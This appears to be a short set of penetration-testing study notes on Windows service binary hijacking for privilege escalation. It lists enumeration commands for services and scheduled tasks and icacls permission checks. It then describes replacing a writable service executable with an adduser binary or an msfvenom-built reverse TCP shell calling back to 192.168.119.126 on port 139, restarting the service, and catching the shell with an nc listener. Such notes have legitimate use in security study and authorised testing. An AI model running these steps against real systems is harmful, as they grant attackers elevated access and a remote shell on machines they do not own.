Service Binary hijacking

Service Binary hijacking

• check programs on scheduled tasks

  • schtasks /query /fo LIST /v

  • Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

• Check permission (full or writable) of programs found

  • icacls <full-path>

  • icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

• transfer any adduser.exe executable and rename it with exploitable exe name

  • OR msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe

• sc.exe stop <service-name>

• sc.exe start <service-name>

• nc -nvlp 139 if reverse shell exe is used